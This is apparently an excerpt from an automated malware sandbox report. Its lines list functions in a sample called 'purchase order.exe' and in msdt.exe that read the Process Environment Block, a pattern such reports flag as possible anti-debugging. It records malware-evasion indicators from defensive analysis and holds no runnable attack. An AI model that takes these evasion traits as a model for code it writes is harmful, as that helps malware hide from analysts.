Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h] 2_2_017AC600
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D8E00 mov eax, dword ptr fs:[00000030h] 2_2_017D8E00
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861608 mov eax, dword ptr fs:[00000030h] 2_2_01861608
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B76E2 mov eax, dword ptr fs:[00000030h] 2_2_017B76E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D16E0 mov ecx, dword ptr fs:[00000030h] 2_2_017D16E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D36CC mov eax, dword ptr fs:[00000030h] 2_2_017D36CC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E8EC7 mov eax, dword ptr fs:[00000030h] 2_2_017E8EC7
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185FE3F mov eax, dword ptr fs:[00000030h] 2_2_0185FE3F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h] 2_2_0186AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486849B mov eax, dword ptr fs:[00000030h] 5_2_0486849B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928CD6 mov eax, dword ptr fs:[00000030h] 5_2_04928CD6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049114FB mov eax, dword ptr fs:[00000030h] 5_2_049114FB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h] 5_2_048D6CF0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h] 5_2_048D6C0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h] 5_2_04911C06
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492740D mov eax, dword ptr fs:[00000030h] 5_2_0492740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492740D mov eax, dword ptr fs:[00000030h] 5_2_0492740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492740D mov eax, dword ptr fs:[00000030h] 5_2_0492740D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488BC2C mov eax, dword ptr fs:[00000030h] 5_2_0488BC2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A44B mov eax, dword ptr fs:[00000030h] 5_2_0488A44B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EC450 mov eax, dword ptr fs:[00000030h] 5_2_048EC450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EC450 mov eax, dword ptr fs:[00000030h] 5_2_048EC450
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487746D mov eax, dword ptr fs:[00000030h] 5_2_0487746D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 mov eax, dword ptr fs:[00000030h] 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h] 5_2_04852D8A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488FD9B mov eax, dword ptr fs:[00000030h] 5_2_0488FD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488FD9B mov eax, dword ptr fs:[00000030h] 5_2_0488FD9B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048835A1 mov eax, dword ptr fs:[00000030h] 5_2_048835A1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h] 5_2_04881DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h] 5_2_04881DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h] 5_2_04881DB5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049205AC mov eax, dword ptr fs:[00000030h] 5_2_049205AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049205AC mov eax, dword ptr fs:[00000030h] 5_2_049205AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov ecx, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h] 5_2_048D6DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04908DF1 mov eax, dword ptr fs:[00000030h] 5_2_04908DF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0486D5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0486D5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0491FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928D34 mov eax, dword ptr fs:[00000030h] 5_2_04928D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491E539 mov eax, dword ptr fs:[00000030h] 5_2_0491E539
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h] 5_2_04863D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h] 5_2_04884D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h] 5_2_04884D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h] 5_2_04884D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485AD30 mov eax, dword ptr fs:[00000030h] 5_2_0485AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048DA537 mov eax, dword ptr fs:[00000030h] 5_2_048DA537
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04893D43 mov eax, dword ptr fs:[00000030h] 5_2_04893D43
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D3540 mov eax, dword ptr fs:[00000030h] 5_2_048D3540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04903D40 mov eax, dword ptr fs:[00000030h] 5_2_04903D40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04877D50 mov eax, dword ptr fs:[00000030h] 5_2_04877D50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487C577 mov eax, dword ptr fs:[00000030h] 5_2_0487C577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487C577 mov eax, dword ptr fs:[00000030h] 5_2_0487C577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EFE87 mov eax, dword ptr fs:[00000030h] 5_2_048EFE87
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D46A7 mov eax, dword ptr fs:[00000030h] 5_2_048D46A7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h] 5_2_04920EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h] 5_2_04920EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h] 5_2_04920EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928ED6 mov eax, dword ptr fs:[00000030h] 5_2_04928ED6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048836CC mov eax, dword ptr fs:[00000030h] 5_2_048836CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04898EC7 mov eax, dword ptr fs:[00000030h] 5_2_04898EC7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0490FEC0 mov eax, dword ptr fs:[00000030h] 5_2_0490FEC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048676E2 mov eax, dword ptr fs:[00000030h] 5_2_048676E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048816E0 mov ecx, dword ptr fs:[00000030h] 5_2_048816E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h] 5_2_0485C600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h] 5_2_0485C600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h] 5_2_0485C600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04888E00 mov eax, dword ptr fs:[00000030h] 5_2_04888E00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A61C mov eax, dword ptr fs:[00000030h] 5_2_0488A61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A61C mov eax, dword ptr fs:[00000030h] 5_2_0488A61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911608 mov eax, dword ptr fs:[00000030h] 5_2_04911608
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485E620 mov eax, dword ptr fs:[00000030h] 5_2_0485E620
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0490FE3F mov eax, dword ptr fs:[00000030h] 5_2_0490FE3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h] 5_2_04867E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AE44 mov eax, dword ptr fs:[00000030h] 5_2_0491AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AE44 mov eax, dword ptr fs:[00000030h] 5_2_0491AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486766D mov eax, dword ptr fs:[00000030h] 5_2_0486766D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h] 5_2_0487AE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04868794 mov eax, dword ptr fs:[00000030h] 5_2_04868794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h] 5_2_048D7794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h] 5_2_048D7794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h] 5_2_048D7794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048937F5 mov eax, dword ptr fs:[00000030h] 5_2_048937F5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A70E mov eax, dword ptr fs:[00000030h] 5_2_0488A70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A70E mov eax, dword ptr fs:[00000030h] 5_2_0488A70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487F716 mov eax, dword ptr fs:[00000030h] 5_2_0487F716
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EFF10 mov eax, dword ptr fs:[00000030h] 5_2_048EFF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EFF10 mov eax, dword ptr fs:[00000030h] 5_2_048EFF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492070D mov eax, dword ptr fs:[00000030h] 5_2_0492070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492070D mov eax, dword ptr fs:[00000030h] 5_2_0492070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04854F2E mov eax, dword ptr fs:[00000030h] 5_2_04854F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04854F2E mov eax, dword ptr fs:[00000030h] 5_2_04854F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488E730 mov eax, dword ptr fs:[00000030h] 5_2_0488E730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486EF40 mov eax, dword ptr fs:[00000030h] 5_2_0486EF40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486FF60 mov eax, dword ptr fs:[00000030h] 5_2_0486FF60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04928F6A mov eax, dword ptr fs:[00000030h] 5_2_04928F6A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859080 mov eax, dword ptr fs:[00000030h] 5_2_04859080
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D3884 mov eax, dword ptr fs:[00000030h] 5_2_048D3884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D3884 mov eax, dword ptr fs:[00000030h] 5_2_048D3884
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048990AF mov eax, dword ptr fs:[00000030h] 5_2_048990AF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 mov eax, dword ptr fs:[00000030h] 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488F0BF mov ecx, dword ptr fs:[00000030h] 5_2_0488F0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488F0BF mov eax, dword ptr fs:[00000030h] 5_2_0488F0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488F0BF mov eax, dword ptr fs:[00000030h] 5_2_0488F0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov ecx, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048EB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048EB8D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h] 5_2_048540E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h] 5_2_048540E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048540E1 mov eax, dword ptr fs:[00000030h] 5_2_048540E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048558EC mov eax, dword ptr fs:[00000030h] 5_2_048558EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04924015 mov eax, dword ptr fs:[00000030h] 5_2_04924015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04924015 mov eax, dword ptr fs:[00000030h] 5_2_04924015
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h] 5_2_048D7016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h] 5_2_048D7016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D7016 mov eax, dword ptr fs:[00000030h] 5_2_048D7016
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488002D mov eax, dword ptr fs:[00000030h] 5_2_0488002D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B02A mov eax, dword ptr fs:[00000030h] 5_2_0486B02A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04870050 mov eax, dword ptr fs:[00000030h] 5_2_04870050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04870050 mov eax, dword ptr fs:[00000030h] 5_2_04870050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04912073 mov eax, dword ptr fs:[00000030h] 5_2_04912073
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04921074 mov eax, dword ptr fs:[00000030h] 5_2_04921074
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487C182 mov eax, dword ptr fs:[00000030h] 5_2_0487C182
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488A185 mov eax, dword ptr fs:[00000030h] 5_2_0488A185
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882990 mov eax, dword ptr fs:[00000030h] 5_2_04882990
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048861A0 mov eax, dword ptr fs:[00000030h] 5_2_048861A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048861A0 mov eax, dword ptr fs:[00000030h] 5_2_048861A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D69A6 mov eax, dword ptr fs:[00000030h] 5_2_048D69A6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048D51BE mov eax, dword ptr fs:[00000030h] 5_2_048D51BE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049149A4 mov eax, dword ptr fs:[00000030h] 5_2_049149A4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0485B1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0485B1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B1E1 mov eax, dword ptr fs:[00000030h] 5_2_0485B1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048E41E8 mov eax, dword ptr fs:[00000030h] 5_2_048E41E8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859100 mov eax, dword ptr fs:[00000030h] 5_2_04859100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859100 mov eax, dword ptr fs:[00000030h] 5_2_04859100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04859100 mov eax, dword ptr fs:[00000030h] 5_2_04859100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov eax, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 mov ecx, dword ptr fs:[00000030h] 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488513A mov eax, dword ptr fs:[00000030h] 5_2_0488513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488513A mov eax, dword ptr fs:[00000030h] 5_2_0488513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h] 5_2_0487B944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h] 5_2_0487B944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485C962 mov eax, dword ptr fs:[00000030h] 5_2_0485C962
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h] 5_2_0485B171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h] 5_2_0485B171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h] 5_2_0488D294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h] 5_2_0488D294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h] 5_2_048552A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0486AAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0486AAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488FAB0 mov eax, dword ptr fs:[00000030h] 5_2_0488FAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882ACB mov eax, dword ptr fs:[00000030h] 5_2_04882ACB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882AE4 mov eax, dword ptr fs:[00000030h] 5_2_04882AE4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h] 5_2_0491AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h] 5_2_0491AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04868A0A mov eax, dword ptr fs:[00000030h] 5_2_04868A0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h] 5_2_0485AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h] 5_2_0485AA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04855210 mov eax, dword ptr fs:[00000030h] 5_2_04855210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04855210 mov ecx, dword ptr fs:[00000030h] 5_2_04855210
